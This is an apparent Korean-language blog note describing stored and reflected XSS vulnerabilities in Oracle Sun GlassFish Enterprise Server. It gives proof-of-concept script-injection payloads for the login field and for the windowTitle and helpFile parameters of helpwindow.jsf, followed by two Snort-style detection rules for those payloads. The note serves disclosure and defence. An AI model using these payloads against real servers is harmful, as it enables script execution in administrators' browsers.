Oracle Sun GlassFish Enterprise Server Stored XSS Vulnerability

<Stored xss 취약점>

로그인 필드에

‘>\”><script>alert(3);</script>같은 코드를 넣으면 로그에는 잘못된 로그 시도로 위의 코드가 저장될 것이고,

유저가 로그 파일을 검색할 때, 유저의 브라우져 에서는 저장된 악성코드가(위의 코드가)실행될 것 이다.

<Reflected xss 취약점>

windowsTitle 이나 helpFile의 변수를 다음과 같이 변경할 때 Reflected xss 취약점이 발생할 수 있다.

/com_sun_webui_jsf/help/helpwindow.jsf?&windowTitle=Help+Window’>\”>

<script>alert(1);</script>&helpFile=commontask.html

/com_sun_webui_jsf/help/helpwindow.jsf?&windowTitle=Help+Window&

helpFile=commontask.html’>\”><script>alert(1);</script>

 

 

Stored xss 취약점

alert tcp any any -> any any (content:”/j_security_check?loginbutton”; nocase; pcre:”/j_username\x3d%27%3E%5C%22%3E%3Cscript[^>]*%3E[^<]*%3C%2Fscript%3e/i”)

Reflaeted xss 취약점

alert tcp any any -> any any (content:”/com_sun_webui_jsf/help/helpwindow.jsf”; nocase; pcre:”/\x27\x3e\x5c\x22\x3e\x3cscript[^>]*\x3e[^<]*\x3c\x2fscript\x3e/i”)

Advertisements

About this entry